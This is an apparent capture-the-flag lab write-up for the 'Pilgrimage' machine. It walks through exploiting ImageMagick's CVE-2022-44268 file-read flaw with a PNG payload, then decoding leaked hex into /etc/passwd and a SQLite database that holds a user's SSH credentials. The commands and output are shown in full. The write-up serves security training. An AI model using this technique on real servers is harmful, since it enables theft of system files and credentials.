InfoSec LAB

Pilgrimage_Exploitation

Created: 4 min read

File Read

The target web application has the .git directory exposed and sitting right at the web root leading me to download a copy of the web application. I found out that the target web app is using ImageMagick in the backend for image processing operation and the instance is vulnerable to [[Pilgrimage_CVE-2022-44268#[CVE-2022-44268](https //nvd.nist.gov/vuln/detail/CVE-2022-44268)|CVE-2022-44268]]

The exploit is written in Rust and generates a PNG payload, allowing me to read files on the target system

Dry-run

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ cargo run "/etc/passwd"
    Finished dev [unoptimized + debuginfo] target(s) in 0.03s
     Running `target/debug/cve-2022-44268 /etc/passwd`

I will first test it out by attempting to read the /etc/passwd file on the target system

Uploaded

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ wget -q http://pilgrimage.htb/shrunk/649be69ea03aa.png

I can then grab the converted image

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ identify -verbose 649be69ea03aa.png                                   
Image:
  Filename: 649be69ea03aa.png
  Format: PNG (Portable Network Graphics)
  Mime type: image/png
  Class: PseudoClass
  Geometry: 100x100+0+0
  Units: Undefined
  Colorspace: sRGB
  Type: Palette
  Base type: Undefined
  Endianness: Undefined
  Depth: 8/1-bit
  Channel depth:
    red: 1-bit
    green: 1-bit
    blue: 1-bit
  Channel statistics:
    Pixels: 10000
    Red:
      min: 255  (1)
      max: 255 (1)
      mean: 255 (1)
      standard deviation: 0 (0)
      kurtosis: 8.192e+51
      skewness: 1e+36
      entropy: 0
    Green:
      min: 0  (0)
      max: 0 (0)
      mean: 0 (0)
      standard deviation: 0 (0)
      kurtosis: -3
      skewness: 0
      entropy: 0
    Blue:
      min: 0  (0)
      max: 0 (0)
      mean: 0 (0)
      standard deviation: 0 (0)
      kurtosis: -3
      skewness: 0
      entropy: 0
  Image statistics:
    Overall:
      min: 0  (0)
      max: 255 (1)
      mean: 85 (0.333333)
      standard deviation: 0 (0)
      kurtosis: -1.5001
      skewness: 0.707071
      entropy: 0
  Colors: 1
  Histogram:
    10000: (255,0,0) #FF0000 red
  Colormap entries: 2
  Colormap:
    0: (255,0,0) #FF0000 red
    1: (255,255,255) #FFFFFF white
  Rendering intent: Perceptual
  Gamma: 0.45455
  Chromaticity:
    red primary: (0.64,0.33)
    green primary: (0.3,0.6)
    blue primary: (0.15,0.06)
    white point: (0.3127,0.329)
  Background color: srgb(99.6124%,99.6124%,99.6124%)
  Border color: srgb(223,223,223)
  Matte color: grey74
  Transparent color: black
  Interlace: None
  Intensity: Undefined
  Compose: Over
  Page geometry: 100x100+0+0
  Dispose: Undefined
  Iterations: 0
  Compression: Zip
  Orientation: Undefined
  Properties:
    date:create: 2023-06-28T07:52:43+00:00
    date:modify: 2023-06-28T07:51:58+00:00
    date:timestamp: 2023-06-28T07:51:58+00:00
    png:bKGD: chunk was found (see Background color, above)
    png:cHRM: chunk was found (see Chromaticity, above)
    png:gAMA: gamma=0.45455 (See Gamma, above)
    png:IHDR.bit-depth-orig: 1
    png:IHDR.bit_depth: 1
    png:IHDR.color-type-orig: 3
    png:IHDR.color_type: 3 (Indexed)
    png:IHDR.interlace_method: 0 (Not interlaced)
    png:IHDR.width,height: 100, 100
    png:PLTE.number_colors: 2
    png:sRGB: intent=0 (Perceptual Intent)
    png:text: 4 tEXt/zTXt/iTXt chunks were found
    png:tIME: 2023-06-28T07:51:58Z
    Raw profile type: 
 
    1437
726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a6461656d
6f6e3a783a313a313a6461656d6f6e3a2f7573722f7362696e3a2f7573722f7362696e2f
6e6f6c6f67696e0a62696e3a783a323a323a62696e3a2f62696e3a2f7573722f7362696e
2f6e6f6c6f67696e0a7379733a783a333a333a7379733a2f6465763a2f7573722f736269
6e2f6e6f6c6f67696e0a73796e633a783a343a36353533343a73796e633a2f62696e3a2f
62696e2f73796e630a67616d65733a783a353a36303a67616d65733a2f7573722f67616d
65733a2f7573722f7362696e2f6e6f6c6f67696e0a6d616e3a783a363a31323a6d616e3a
2f7661722f63616368652f6d616e3a2f7573722f7362696e2f6e6f6c6f67696e0a6c703a
783a373a373a6c703a2f7661722f73706f6f6c2f6c70643a2f7573722f7362696e2f6e6f
6c6f67696e0a6d61696c3a783a383a383a6d61696c3a2f7661722f6d61696c3a2f757372
2f7362696e2f6e6f6c6f67696e0a6e6577733a783a393a393a6e6577733a2f7661722f73
706f6f6c2f6e6577733a2f7573722f7362696e2f6e6f6c6f67696e0a757563703a783a31
303a31303a757563703a2f7661722f73706f6f6c2f757563703a2f7573722f7362696e2f
6e6f6c6f67696e0a70726f78793a783a31333a31333a70726f78793a2f62696e3a2f7573
722f7362696e2f6e6f6c6f67696e0a7777772d646174613a783a33333a33333a7777772d
646174613a2f7661722f7777773a2f7573722f7362696e2f6e6f6c6f67696e0a6261636b
75703a783a33343a33343a6261636b75703a2f7661722f6261636b7570733a2f7573722f
7362696e2f6e6f6c6f67696e0a6c6973743a783a33383a33383a4d61696c696e67204c69
7374204d616e616765723a2f7661722f6c6973743a2f7573722f7362696e2f6e6f6c6f67
696e0a6972633a783a33393a33393a697263643a2f72756e2f697263643a2f7573722f73
62696e2f6e6f6c6f67696e0a676e6174733a783a34313a34313a476e617473204275672d
5265706f7274696e672053797374656d202861646d696e293a2f7661722f6c69622f676e
6174733a2f7573722f7362696e2f6e6f6c6f67696e0a6e6f626f64793a783a3635353334
3a36353533343a6e6f626f64793a2f6e6f6e6578697374656e743a2f7573722f7362696e
2f6e6f6c6f67696e0a5f6170743a783a3130303a36353533343a3a2f6e6f6e6578697374
656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d6e6574776f72
6b3a783a3130313a3130323a73797374656d64204e6574776f726b204d616e6167656d65
6e742c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e
0a73797374656d642d7265736f6c76653a783a3130323a3130333a73797374656d642052
65736f6c7665722c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f
6c6f67696e0a6d6573736167656275733a783a3130333a3130393a3a2f6e6f6e65786973
74656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d74696d6573
796e633a783a3130343a3131303a73797374656d642054696d652053796e6368726f6e69
7a6174696f6e2c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c
6f67696e0a656d696c793a783a313030303a313030303a656d696c792c2c2c3a2f686f6d
652f656d696c793a2f62696e2f626173680a73797374656d642d636f726564756d703a78
3a3939393a3939393a73797374656d6420436f72652044756d7065723a2f3a2f7573722f
7362696e2f6e6f6c6f67696e0a737368643a783a3130353a36353533343a3a2f72756e2f
737368643a2f7573722f7362696e2f6e6f6c6f67696e0a5f6c617572656c3a783a393938
3a3939383a3a2f7661722f6c6f672f6c617572656c3a2f62696e2f66616c73650a
 
    signature: d02a8da86fec6ef80c209c8437c76cf8fbecb6528cd7ba95ef93eecc52a171c7
  Artifacts:
    filename: 649be69ea03aa.png
    verbose: true
  Tainted: False
  Filesize: 1080B
  Number pixels: 10000
  Pixels per second: 6.68619MB
  User time: 0.000u
  Elapsed time: 0:01.001
  Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org

There is the returned hexstring I will save that

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ cat hexstring | xxd -r -p          
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false

It’s confirmed. Based on the output, the emily user appears to be the sole user

DB File

I tried grabbing the user’s SSH private key, but failed likely due to the lack of privileges as the web server isn’t running with privileges of the emily user Then, I realized that I could try enumerating the DB file, whose location was hard-coded in to the source code; /var/db/pilgrimage

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ cargo run "/var/db/pilgrimage"     
    Finished dev [unoptimized + debuginfo] target(s) in 0.01s
     Running `target/debug/cve-2022-44268 /var/db/pilgrimage`

Generating a payload accordingly

Upload complete

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ wget -q http://pilgrimage.htb/shrunk/649bf0e899f0b.png 
 
┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ identify -verbose 649bf0e899f0b.png 
 
[...REDACTED...]

Downloading the converted image and saving the hexstring

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ cat hexstring | tr -d "\n\r" | xxd -r -p > pilgrimage
 
┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ file pilgrimage   
pilgrimage: SQLite 3.x database, last written using SQLite version 3034001, file counter 76, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 76

Done

pilgrimage

The DB contains the users table with username and password as columns

The table contains the credential for the emily user

I will test the credential against the target SSH server

Interactive Graph View

Backlinks